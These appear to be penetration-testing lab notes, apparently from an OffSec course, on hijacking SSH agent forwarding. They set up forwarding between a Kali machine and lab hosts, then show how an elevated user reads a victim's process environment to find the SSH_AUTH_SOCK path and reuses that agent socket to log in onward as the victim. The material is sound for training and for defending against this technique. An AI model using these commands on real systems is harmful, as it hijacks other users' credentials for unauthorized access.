Hijacking Using SSH-Agent

SSH-Agent is a utility that keeps track of a user’s private keys and allows them to be used without having to repeat their passphrases on every connection.

ssh-keygen

For our SSH connections to work using SSH-Agent forwarding, we need to have our public key installed on both the intermediate server and the destination server. In our case, the intermediate server will be the controller machine and the destination server will be linuxvictim.

We can copy our key to both of them using the ssh-copy-id command from our Kali VM, specifying our public key with the -i flag.

ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@controller
ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@linuxvictim

Set our local SSH config file in ~/.ssh/config on our Kali

ForwardAgent yes

Next, on the intermediate server, which in our case is the controller, we need to have the following line set in /etc/ssh/sshd_config

AllowAgentForwarding yes

On Kali:

eval `ssh-agent`
ssh-add

Now that our key is registered with the agent, all we need to do to connect to the downstream server is a pair of ssh commands. We’ll first ssh to the controller and then from there to the linuxvictim host.

ssh offsec@controller
ssh offsec@linuxvictim

Leverage the victim user’s open socket directly

ps aux | grep ssh
pstree -p offsec | grep ssh

cat /proc/16381/environ

This variable lets SSH-Agent know where its socket file is located

SSH_AUTH_SOCK=/tmp/ssh- 7OgTFiQJhL/agent.16380

As an elevated user, we can use the victim’s SSH agent socket file as if it were our own

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh

Last updated 2 years ago